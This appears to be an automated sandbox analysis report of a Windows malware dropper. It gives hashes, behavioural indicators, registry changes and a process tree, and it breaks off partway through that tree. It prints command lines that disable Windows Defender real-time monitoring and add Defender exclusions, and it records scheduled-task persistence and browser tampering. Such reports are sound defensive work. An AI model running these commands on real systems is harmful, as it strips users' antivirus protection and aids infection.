Analysis
-
max time kernel
132s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
03-02-2023 06:23
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
695b21a6c212659132036546f0aea74c
-
SHA1
074c7cae21cb2bf2db9d0b7c3203e3033ad4096a
-
SHA256
80e35ccffd09b91e2efc6f921b8fcdfea20a718f5aee6468a401304a12645b0c
-
SHA512
6a2e85c306db207ec2b6acf88f6a4d506eebf7f1c950342caf12aef714e713ed41cf56aca9ada79b1441f9e053a576102e1bc0b42674be43b4118cbc2de5cb54
-
SSDEEP
196608:91OiCBQr8/vVkYD0LZeVLqhhJogjl3G6iaWEC/4vEINA:3OIAdVoLZeh12W6iWlvrW
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pUFhDAsVKPgbC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\aEAhOyLGAJEeHmSw = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LffyXglieFfFoFiacpR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NfNiqhmdbjMU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\dmGirQmnfsEKeFVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LffyXglieFfFoFiacpR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\aEAhOyLGAJEeHmSw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\pUFhDAsVKPgbC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\aEAhOyLGAJEeHmSw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DSoIyVzZU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\kcruyFmhpDOqNnXOb = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DSoIyVzZU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MDIoNgUDyTUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\aEAhOyLGAJEeHmSw = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\dmGirQmnfsEKeFVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MDIoNgUDyTUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NfNiqhmdbjMU2 = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1252 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Control Panel\International\Geo\Nation bSTmkGM.exe -
Executes dropped EXE 4 IoCs
pid Process 2040 Install.exe 968 Install.exe 1156 UNiJltb.exe 1732 bSTmkGM.exe -
Loads dropped DLL 12 IoCs
pid Process 2036 file.exe 2040 Install.exe 2040 Install.exe 2040 Install.exe 2040 Install.exe 968 Install.exe 968 Install.exe 968 Install.exe 1252 rundll32.exe 1252 rundll32.exe 1252 rundll32.exe 1252 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json bSTmkGM.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UNiJltb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA bSTmkGM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol bSTmkGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 bSTmkGM.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini UNiJltb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 bSTmkGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 bSTmkGM.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat bSTmkGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bSTmkGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bSTmkGM.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol UNiJltb.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 bSTmkGM.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA bSTmkGM.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\NfNiqhmdbjMU2\muZCynXieCYIO.dll bSTmkGM.exe File created C:\Program Files (x86)\NfNiqhmdbjMU2\KCPCDUW.xml bSTmkGM.exe File created C:\Program Files (x86)\LffyXglieFfFoFiacpR\LzMTKfo.dll bSTmkGM.exe File created C:\Program Files (x86)\pUFhDAsVKPgbC\CXKqEBb.xml bSTmkGM.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi bSTmkGM.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak bSTmkGM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja bSTmkGM.exe File created C:\Program Files (x86)\LffyXglieFfFoFiacpR\FhnFZow.xml bSTmkGM.exe File created C:\Program Files (x86)\pUFhDAsVKPgbC\FzIKlUi.dll bSTmkGM.exe File created C:\Program Files (x86)\MDIoNgUDyTUn\cyHETkF.dll bSTmkGM.exe File created C:\Program Files (x86)\DSoIyVzZU\uCniCI.dll bSTmkGM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi bSTmkGM.exe File created C:\Program Files (x86)\DSoIyVzZU\TRAiBAU.xml bSTmkGM.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bqPrGzjNEdzQQUiKbx.job schtasks.exe File created C:\Windows\Tasks\djBZseDcsfXCKCDwv.job schtasks.exe File created C:\Windows\Tasks\knFkktILFVnIDkr.job schtasks.exe File created C:\Windows\Tasks\nCFnhfHwXtGOFkPnU.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1256 schtasks.exe 1088 schtasks.exe 2028 schtasks.exe 1952 schtasks.exe 692 schtasks.exe 336 schtasks.exe 1016 schtasks.exe 940 schtasks.exe 636 schtasks.exe 712 schtasks.exe 616 schtasks.exe 700 schtasks.exe 568 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-36-e5-4e-33-14\WpadDecisionTime = 70596ba4a037d901 bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs bSTmkGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bSTmkGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2D7A8511-8050-44E2-9AD0-901C413A004A}\WpadDecisionReason = "1" bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-36-e5-4e-33-14 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2D7A8511-8050-44E2-9AD0-901C413A004A}\9a-36-e5-4e-33-14 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-36-e5-4e-33-14\WpadDecisionTime = 70596ba4a037d901 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2D7A8511-8050-44E2-9AD0-901C413A004A}\WpadDecisionTime = 70596ba4a037d901 bSTmkGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-36-e5-4e-33-14\WpadDecisionReason = "1" bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates bSTmkGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-36-e5-4e-33-14\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust bSTmkGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix bSTmkGM.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates bSTmkGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings bSTmkGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" bSTmkGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2D7A8511-8050-44E2-9AD0-901C413A004A}\WpadDecision = "0" bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs bSTmkGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-36-e5-4e-33-14\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust bSTmkGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates bSTmkGM.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 bSTmkGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1568 powershell.EXE 1568 powershell.EXE 1568 powershell.EXE 1216 powershell.EXE 1216 powershell.EXE 1216 powershell.EXE 1808 powershell.EXE 1808 powershell.EXE 1808 powershell.EXE 1500 powershell.EXE 1500 powershell.EXE 1500 powershell.EXE 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe 1732 bSTmkGM.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1568 powershell.EXE Token: SeDebugPrivilege 1216 powershell.EXE Token: SeDebugPrivilege 1808 powershell.EXE Token: SeDebugPrivilege 1500 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2036 wrote to memory of 2040 2036 file.exe 28 PID 2036 wrote to memory of 2040 2036 file.exe 28 PID 2036 wrote to memory of 2040 2036 file.exe 28 PID 2036 wrote to memory of 2040 2036 file.exe 28 PID 2036 wrote to memory of 2040 2036 file.exe 28 PID 2036 wrote to memory of 2040 2036 file.exe 28 PID 2036 wrote to memory of 2040 2036 file.exe 28 PID 2040 wrote to memory of 968 2040 Install.exe 29 PID 2040 wrote to memory of 968 2040 Install.exe 29 PID 2040 wrote to memory of 968 2040 Install.exe 29 PID 2040 wrote to memory of 968 2040 Install.exe 29 PID 2040 wrote to memory of 968 2040 Install.exe 29 PID 2040 wrote to memory of 968 2040 Install.exe 29 PID 2040 wrote to memory of 968 2040 Install.exe 29 PID 968 wrote to memory of 604 968 Install.exe 31 PID 968 wrote to memory of 604 968 Install.exe 31 PID 968 wrote to memory of 604 968 Install.exe 31 PID 968 wrote to memory of 604 968 Install.exe 31 PID 968 wrote to memory of 604 968 Install.exe 31 PID 968 wrote to memory of 604 968 Install.exe 31 PID 968 wrote to memory of 604 968 Install.exe 31 PID 968 wrote to memory of 904 968 Install.exe 33 PID 968 wrote to memory of 904 968 Install.exe 33 PID 968 wrote to memory of 904 968 Install.exe 33 PID 968 wrote to memory of 904 968 Install.exe 33 PID 968 wrote to memory of 904 968 Install.exe 33 PID 968 wrote to memory of 904 968 Install.exe 33 PID 968 wrote to memory of 904 968 Install.exe 33 PID 604 wrote to memory of 1948 604 forfiles.exe 35 PID 604 wrote to memory of 1948 604 forfiles.exe 35 PID 604 wrote to memory of 1948 604 forfiles.exe 35 PID 604 wrote to memory of 1948 604 forfiles.exe 35 PID 604 wrote to memory of 1948 604 forfiles.exe 35 PID 604 wrote to memory of 1948 604 forfiles.exe 35 PID 604 wrote to memory of 1948 604 forfiles.exe 35 PID 904 wrote to memory of 808 904 forfiles.exe 36 PID 904 wrote to memory of 808 904 forfiles.exe 36 PID 904 wrote to memory of 808 904 forfiles.exe 36 PID 904 wrote to memory of 808 904 forfiles.exe 36 PID 904 wrote to memory of 808 904 forfiles.exe 36 PID 904 wrote to memory of 808 904 forfiles.exe 36 PID 904 wrote to memory of 808 904 forfiles.exe 36 PID 1948 wrote to memory of 1676 1948 cmd.exe 37 PID 1948 wrote to memory of 1676 1948 cmd.exe 37 PID 1948 wrote to memory of 1676 1948 cmd.exe 37 PID 1948 wrote to memory of 1676 1948 cmd.exe 37 PID 1948 wrote to memory of 1676 1948 cmd.exe 37 PID 1948 wrote to memory of 1676 1948 cmd.exe 37 PID 1948 wrote to memory of 1676 1948 cmd.exe 37 PID 808 wrote to memory of 1628 808 cmd.exe 38 PID 808 wrote to memory of 1628 808 cmd.exe 38 PID 808 wrote to memory of 1628 808 cmd.exe 38 PID 808 wrote to memory of 1628 808 cmd.exe 38 PID 808 wrote to memory of 1628 808 cmd.exe 38 PID 808 wrote to memory of 1628 808 cmd.exe 38 PID 808 wrote to memory of 1628 808 cmd.exe 38 PID 808 wrote to memory of 1768 808 cmd.exe 39 PID 808 wrote to memory of 1768 808 cmd.exe 39 PID 808 wrote to memory of 1768 808 cmd.exe 39 PID 808 wrote to memory of 1768 808 cmd.exe 39 PID 808 wrote to memory of 1768 808 cmd.exe 39 PID 808 wrote to memory of 1768 808 cmd.exe 39 PID 808 wrote to memory of 1768 808 cmd.exe 39 PID 1948 wrote to memory of 1156 1948 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\7zSB86.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\7zS1018.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
